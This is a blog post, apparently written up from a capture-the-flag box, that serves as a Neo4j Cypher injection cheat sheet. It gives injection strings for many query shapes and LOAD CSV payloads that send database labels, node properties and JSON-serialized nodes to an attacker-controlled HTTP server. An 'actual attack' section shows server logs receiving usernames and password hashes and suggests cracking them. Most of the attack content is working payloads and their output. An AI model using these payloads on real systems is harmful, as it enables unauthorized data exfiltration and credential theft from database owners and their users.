首页 > 其他分享 >Neo4j Exfiltrate data ,Injection

Neo4j Exfiltrate data ,Injection

时间:2024-03-08 15:27:32浏览次数:42  
标签:200 HTTP Aug GET Exfiltrate 25 10.10 Neo4j Injection

Injections

How to inject

Injectable query                      Injection
Macth (o) where o.Id='{input}'           'OR 1=1 with 0 as _l00 {...} RETURN 1 //

MATCH (o) wehre '{input}' = o.Id          '=' {...} with 0 as _l00 return 1 //
MATCH (o) where {input} in 
[different,values]

MATCH (o) where o:{input}               a {...} with 0 as _l00 return 1 //

MATCH (o) where o:`{input}`              a` {...} with 0 as _l00 return 1 //

MATCH (o {id:'{input}'})                '}) return 1 union match (n) {...} return 1 //

MATCH (o:{input})                    a) return 1 union match (n) {...} return 1 //

MATCH (o:`{input}`)                   a`) return 1 union match (n) {...} return 1 //

MATCH (o)-[r {id:'{input}'}]-(o2)          '}]-() return 1 union match (n) {...} return 1 //

MATCH (o)-[r:{input}]-(o2)              a]-() return 1 union match (n) {...} return 1 //

MATCH (o)-[r:`{input}`]-(o2)             a`]-() return 1 union match (n) {...} return 1 //

 

Note the UNION statement:

1.The reason UNION is required is that if the MATCH statement doesn't return anything,the rest of the query won't run.So all the nefarious things we might do there will simply not execute.

2. We add "RETURN 1" before the UNION so both parts return the same columns,which is required for the query to execute.

Note the WITH statement:

1.Using WITH ,we can drop all existing variables.This is important when we don't know what the query is (more on that later).If our payload accidentally tries to set a variables that already exists,the query will fail to run.

2.If we know the query and the database,none of these techiniques are required.We can even manipulate the returned data to in turn manipulate the process instead of just abusing the server.

Post exploitation

HTTP LOAD CSV

LOAD CSV is a built-in statement that can be used to exfiltrate data.

Load CSV tries to load a csv either from the filesystem or from the web.

Usually,an attacker can use the web functionality to exfiltrate data,If the vulnerable query is :

MATCH (o) where o.Id='{input}' return o

then the attacker can inject the following strings:

' or 1=1 With 1 as _l00 CALL dbms.procedures() yield name LOAD CSV FROM 'https://attacker's ip/' 
name as _l return 1 //

This will send all the installed procedures in the database to the attacker's server.

Extracting data from neo4j

There are many built-in and APOC funcions that can help us get information about the database.

Get labels

Using the built-in method db.labels,it is possible to list all existing labels.

Arguments:None

 

Injection example:

'}) return 0 as _0 union call db.labels() yield label laod csv from 'http://attacker'sip/?l=' 
+ label as 1 return 0 as _0

Get the properties of a node and their values

The built-in function keys can be used to list the keys of the properties.

Arguments:

A node or a map

Its possible to retrieve the value of a propety from the node if you treat it as a map:n[key],

so we can use load csv to exfiltrate the data.Be sure to use toString.

Injection example

' OR 1=1 WITH 1 as a MATCH (f:Flag) UNWIND keys(f) as p LOAD CSV FROM 'http://10.0.2.4:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //

' or 1=1 with 1 as a match (f:Flag) unwind keys(f) as p load csv from 'http://ip/?'+p+'='+toString(f[p]) as l return 0 as _0 //

Tips:This won't work if one of the fields is a list or a map.

If APOC is avaiable,there's better way to do it using apoc.convert.toJson.

' or 1=1 with 0 as _0 match (n) load csv from 'http://ip/?' + apoc.convert.toJson(n) as l return 0 as _0 //

return value:

String--the JSON representation of the input

'}) return 0 as _0 union match (f:Flag) load csv from 'http://ip:port/?json='+apoc.convert.toJson(f) as 1 return 0 as _0 //

Actual attack

' or 1=1 with 1 as a call db.labels() yield label load csv from 'http://10.10.14.16/?label='+label as l return 0 as _0 //

It will return the following information to our python server:

$sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.210 - - [25/Aug/2023 13:26:19] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:26:19] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:26:19] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:26:19] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:26:19] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:26:19] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:26:19] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:26:20] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:26:20] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:26:20] "GET /?label=employee HTTP/1.1" 200

Retrieve the values of the keys for 'users'.Here is our payload:

' or 1=1 with 1 as a match (f:user) unwind keys(f) as p load csv from 'http://10.10.14.16/?'+p+'='+toString(f[p]) as l return 0 as _0 //

This returns the following:

0.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:09] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:10] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [25/Aug/2023 13:33:10] "GET /?username=john HTTP/1.1" 200 -

Using john or hashcat to crack these two password.

标签:200,HTTP,Aug,GET,Exfiltrate,25,10.10,Neo4j,Injection
From: https://www.cnblogs.com/lisenMiller/p/18060340

相关文章

  • springboot集成neo4j
    1创建一个springboot项目引入neo4j的依赖<!--neo4j依赖--><dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-data-neo4j</artifactId></dependency>......
  • 依赖注入(Dependency Injection, DI)是一种设计模式,例如,在React中,父组件可以通过props向
    依赖注入renderprops其实就是React世界中的“依赖注入”(DependencyInjection)。所谓依赖注入,指的是解决这样一个问题:逻辑A依赖于逻辑B,如果让A直接依赖于B,当然可行,但是A就没法做得通用了。依赖注入就是把B的逻辑以函数形式传递给A,A和B之间只需要对这个函数......
  • docker neo4j镜像
      报错了:在指定卷(volume)路径时使用了$HOME环境变量。在Windows的命令提示符(cmd)或PowerShell中,环境变量的语法与在类Unix系统的Shell中不同。$HOME在Windows命令行中通常不会被识别为用户的主目录。要解决这个问题,需要使用Windows环境变量的正确语法。在命令......
  • DVWA-SQL Injection(Blind) SQL盲注
    一般的sql注入是当提交完成后,会将sql的执行结果直接显示在页面或响应信息中。而sql盲注是提交完请求后,不管是执行成功还是失败,都无法直接知道执行结果。只能根据返回的信息来判断。sql盲注常用函数:if()语法格式:if(expr1,expr2,expr3)功能:Expr1为true则返回expr2,expr1为fals......
  • DVWA-SQL Injection(sql注入)
    Sql注入是通过传递含有恶意sql语句的命令,使服务器在组织sql语句时,破坏掉原来的sql语句结构。从而达到执行恶意sql语句的目的。DVWASQLInjection级别--low--medium--high--impossible --low级别:服务器端代码:<?phpif(isset($_REQUEST['Submit']......
  • DVWA-Command Injection(命令注入)
    命令注入是通过提交含有恶意的服务器端可以执行命令,且这些命令能被服务器执行,从而能间接操作服务器。DVWA的CommandInjection级别分为:--low--medium--high--impossible--low级别看以下,正常的操作是输入IP地址,交由服务器进行ping操作,然后再将结果返回给......
  • 基于Java+Neo4j开发的知识图谱+全文检索的知识库管理系统(源码分析)
    在数字化高度普及的时代,企事业机关单位在日常工作中会产生大量的文档,例如医院制度汇编,企业知识共享库等。针对这些文档性的东西,手工纸质化去管理是非常消耗工作量的,并且纸质化查阅难,易损耗,所以电子化管理显得尤为重要。【springboot+elasticsearch+neo4j+vue+activiti】实现数字......
  • 基于Java+Neo4j开发的知识图谱+全文检索的知识库管理系统(源码分析)
    在数字化高度普及的时代,企事业机关单位在日常工作中会产生大量的文档,例如医院制度汇编,企业知识共享库等。针对这些文档性的东西,手工纸质化去管理是非常消耗工作量的,并且纸质化查阅难,易损耗,所以电子化管理显得尤为重要。【springboot+elasticsearch+neo4j+vue+activiti】实现数字......
  • 图数据库Neo4j(最详细教程)
    图数据库Neo4j实战(全网最详细教程)1.图数据库Neo4j介绍1.1什么是图数据库(graphdatabase)​ 随着社交、电商、金融、零售、物联网等行业的快速发展,现实社会织起了了一张庞大而复杂的关系网,传统数据库很难处理关系运算。大数据行业需要处理的数据之间的关系随数据量呈几何级数增......
  • Neo4j图形存储学习笔记
    一、Neo4j图数据库:图形数据库(GraphDatabase)是NoSQL数据库家族中特殊的存在,用于存储丰富的关系数据。与传统的关系型数据库相比,图形数据库更适合处理具有复杂关系和网络结构的数据。Neo4j是目前最流行的图形数据库之一,它支持完整的事务处理,并采用节点与关系的方式来组织和表示数......